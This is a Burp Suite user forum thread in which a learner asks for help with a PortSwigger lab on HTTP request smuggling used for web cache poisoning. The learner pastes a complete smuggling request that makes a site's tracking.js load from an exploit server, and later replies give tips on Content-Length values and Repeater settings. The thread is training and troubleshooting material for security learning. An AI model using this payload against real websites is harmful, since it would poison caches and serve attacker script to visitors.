Burp Suite User Forum

Login to post

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

nergal | Last updated: Aug 20, 2021 10:19PM UTC

Hello everyone! Im having troubles with this lab. I tried even to follow the youtube videos to get with the solution and not even that helps. Im getting a 400 and {"error":"Invalid request"} I tried also to switch browser because in the web cache poisoning labs also had problems with that. Am i doing something wrong? I'll past the request: POST / HTTP/1.1 Host: victimhost Content-Type: application/x-www-form-urlencoded Content-Length: 185 Transfer-Encoding: chunked 0 GET /post/next?postId=1 HTTP/1.1 Host: exploitserver Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/1.1 Host: victimhost Connection: close

Alex, PortSwigger Agent | Last updated: Aug 23, 2021 04:13PM UTC

Hi, Thanks for your post. You may need to repeat the POST/GET process several times before the attack succeeds. It might also be worth disabling any extensions and retrying the lab - in case there are any conflicting options. Thanks

nergal | Last updated: Aug 23, 2021 06:54PM UTC

I repeated it several times trying to get it but still nothing. I also did use a Chrome browser without extensions, a Mozilla Firefox, Chromium in both windows and Linux. Still dont getting it

nergal | Last updated: Aug 24, 2021 03:05AM UTC

Ok. I did it. I was searching for help in some other channel and some friend told me to intercept the request to send the "exploit" instead of using the repeater. That way i just had to send it once and it work at the first shot. Anyway, thank you for your time!

Alex, PortSwigger Agent | Last updated: Aug 24, 2021 07:47AM UTC

Hi, Thanks for the update, glad to hear you solved the lab!

Viren | Last updated: Sep 12, 2021 12:36PM UTC

user 193 instead of 185 in Content-Length header count (it probably due to some new format of the exploit server domains added 8 additional characters with the “exploit-“ prefix)

Kairos | Last updated: Sep 16, 2021 09:15AM UTC

Thanks Viren. I think Portswigger Staff should announce this changes. Otherwise, it's a waste of time trying to figure out how to make it work. Change the solution paragraph on the lab.

Ben, PortSwigger Agent | Last updated: Sep 17, 2021 08:32AM UTC

Hi, Thank you for letting us know about this. We will take a look and discuss this with the Web Academy team.

Ben, PortSwigger Agent | Last updated: Oct 20, 2021 08:54AM UTC

Hi all, Just to confirm, we have now made the change to the solution of this lab (as discussed above) so that it states the correct Content-Length value to use now that we are prefixing the Exploit Server URLs with 'exploit-'.

Sean | Last updated: Dec 23, 2021 12:43AM UTC

I found the issue, for those who still need the help. Before sending the exploit, go into repeater tab and uncheck the update content-length. Then send in repeater and continue until the lab is solved.

You need to Log in to post a reply. Or register here, for free.